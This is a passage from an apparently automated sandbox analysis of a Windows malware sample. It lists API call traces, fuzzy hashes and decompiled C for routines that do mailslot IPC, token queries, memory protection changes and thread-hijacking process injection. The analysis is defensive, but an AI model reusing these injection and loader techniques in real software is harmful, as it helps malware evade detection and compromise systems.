    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
